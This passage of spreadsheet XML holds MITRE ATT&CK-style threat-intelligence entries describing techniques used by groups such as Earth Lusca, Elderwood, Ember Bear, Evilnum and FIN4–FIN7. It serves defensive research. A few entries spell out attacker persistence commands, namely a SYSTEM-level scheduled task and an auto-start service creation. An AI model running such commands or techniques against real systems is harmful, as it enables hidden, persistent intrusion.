    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;ipconfig&lt;/code&gt; to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational”
(Event ID 1024) to obtain network information from RDP connections. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used [netstat](https://attack.mitre.org/software/S0104) from a compromised system to obtain network connection information.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command &lt;code&gt;sc create “SysUpdate” binpath= “cmd /c start “[file path]””&amp;&amp;sc config “SysUpdate” start= auto&amp;&amp;net
start SysUpdate&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)(Citation: Security Affairs Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>The Ritsol backdoor trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) can download files onto a compromised host from a remote location.(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has leveraged multiple types of spearphishing in order to attempt to get a user to open links.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has encrypted documents and malicious executables.(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has packed malware payloads before delivery to victims.(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has added extra spaces between JavaScript code characters to increase the overall file size.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used stolen certificates from Electrum Technologies GmbH to sign payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has stolen legitimate certificates to sign malicious payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used control panel files (CPL), delivered via e-mail, for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has executed a batch script designed to disable Windows Defender on a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has exploited Microsoft Office vulnerability CVE-2017-11882.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used tools to download malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used JavaScript to execute malicious code on a victim's machine.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has attempted to lure victims into executing malicious files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has attempted to lure users to click on a malicious link within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used an open source batch script to modify Windows Defender registry keys.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has obfuscated malware and malicious scripts to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used PowerShell to download and execute malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has packed malware to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t xml:space="preserve">[Ember Bear](https://attack.mitre.org/groups/G1003) has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) </t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has sent spearphishing emails containing malicious links.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t xml:space="preserve">[Ember Bear](https://attack.mitre.org/groups/G1003) has obtained and used open source scripts from GitHub.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) </t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t xml:space="preserve">[Equation](https://attack.mitre.org/groups/G0020) is known to have the capability to overwrite the firmware on hard drives from some manufacturers.(Citation: Kaspersky Equation QA) </t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) has been observed utilizing environmental keying in payload delivery.(Citation: Kaspersky Gauss Whitepaper)(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) has used an encrypted virtual file system stored in the Windows Registry.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has used PowerShell to bypass UAC.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) can collect email credentials from victims.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Evilnum](https://attack.mitre.org/groups/G0120) has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.(Citation: ESET EvilNum July 2020) </t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has deleted files used during infection.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) can deploy additional components or tools as needed.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has used malicious JavaScript files on the victim's machine.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used the malware variant, TerraTV, to run a legitimate TeamViewer application to connect to compromrised machines.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has sent spearphishing emails containing a link to a zip file hosted on Google Drive.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) can steal cookies and session information from browsers.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments. (Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used batch scripts and scheduled tasks to delete critical system files.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has moved laterally using the Local Administrator account.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) uses PowerShell for execution as well as PowerShell Empire to establish persistence.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has established persistence by using the Registry option in PowerShell Empire to add a Run key.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used RDP to move laterally to systems in the victim environment.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used Meterpreter to enumerate users on remote systems.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has relied on publicly-available software to gain footholds and establish persistence in victim environments.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has executed malicious .bat files containing PowerShell commands.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as “hacked," "phish," and “malware" in a likely attempt to prevent organizations from communicating about their activities.(Citation: FireEye Hacking FIN4 Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has presented victims with spoofed Windows Authentication prompts to collect their credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts).(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used Tor to log in to victims' email accounts.(Citation: FireEye Hacking FIN4 Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has accessed and hijacked online email communications using stolen credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used spearphishing emails containing attachments (which are often stolen, legitimate documents sent from compromised accounts) with embedded malicious macros.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used spearphishing emails (often sent from compromised accounts) containing malicious links.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used legitimate credentials to hijack email communications.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used VBA macros to display a dialog box and collect victim credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used HTTP POST requests to transmit data.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) scans processes on all victim systems in the environment and uses automated scripts to pull back the results.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has cleared event logs from victims.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) maintains access to victim environments by using [FLIPSIDE](https://attack.mitre.org/software/S0173) to create a proxy for a backup RDP tunnel.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment.(Citation: FireEye Respond Webinar July 2017)(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) uses [SDelete](https://attack.mitre.org/software/S0195) to clean up the environment and attempt to prevent detection.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) scripts save memory dump data into a specific directory on hosts in the victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has used the open source tool Essential NetTools to map the network and build a list of targets.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has obtained and used a customized version of [PsExec](https://attack.mitre.org/software/S0029), as well as use other tools such as [pwdump](https://attack.mitre.org/software/S0006), [SDelete](https://attack.mitre.org/software/S0195), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.(Citation: FireEye Respond Webinar July 2017)(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>Following data collection, [FIN6](https://attack.mitre.org/groups/G0037) has compressed log files into a ZIP archive prior to staging and exfiltration.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019)	</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has collected schemas and user accounts from systems running SQL Server.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has collected and exfiltrated payment card data from compromised systems.(Citation: Trend Micro FIN6 October 2019)(Citation: RiskIQ British Airways September 2018)(Citation: RiskIQ Newegg September 2018)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has deployed a utility script named &lt;code&gt;kill.bat&lt;/code&gt; to disable anti-virus.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit’s [PsExec](https://attack.mitre.org/software/S0029) NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has removed files from victim machines.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used [Windows Credential Editor](https://attack.mitre.org/software/S0005) for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)	
</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit’s [PsExec](https://attack.mitre.org/software/S0029) NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)	</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit Bind and Reverse TCP stagers.(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t xml:space="preserve"> [FIN6](https://attack.mitre.org/groups/G0037) has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and [FrameworkPOS](https://attack.mitre.org/software/S0503).(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [AdFind](https://attack.mitre.org/software/S0552).(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>To move laterally on a victim network, [FIN6](https://attack.mitre.org/groups/G0037) has used credentials stolen from various systems on which it gathered usernames and password hashes.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used Pastebin and Google Storage to host content for their operations.(Citation: FireEye FIN6 Apr 2019)	
</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used &lt;code&gt;kill.bat&lt;/code&gt; script to disable security tools.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used WMI to automate the remote execution of PowerShell scripts.(Citation: Security Intelligence More Eggs Aug 2019)	</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used application shim databases for persistence.(Citation: FireEye FIN7 Shim Databases)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has signed [Carbanak](https://attack.mitre.org/software/S0030) payloads with legally purchased code signing certificates. [FIN7](https://attack.mitre.org/groups/G0046) has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used SQL scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has performed C2 using DNS via A, OPT, and TXT records.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has collected files and other sensitive information from a compromised network.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has registered look-alike domains for use in phishing campaigns.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) spear phishing campaigns have included malicious Word documents with DDE execution.(Citation: CyberScoop FIN7 Oct 2017)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has exfiltrated stolen data to the MEGA file sharing site.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has exploited ZeroLogon (CVE-2020-1472) against vulnerable domain controllers.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046)'s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: DOJ FIN7 Aug 2018)</t>
  </si>
  <si>
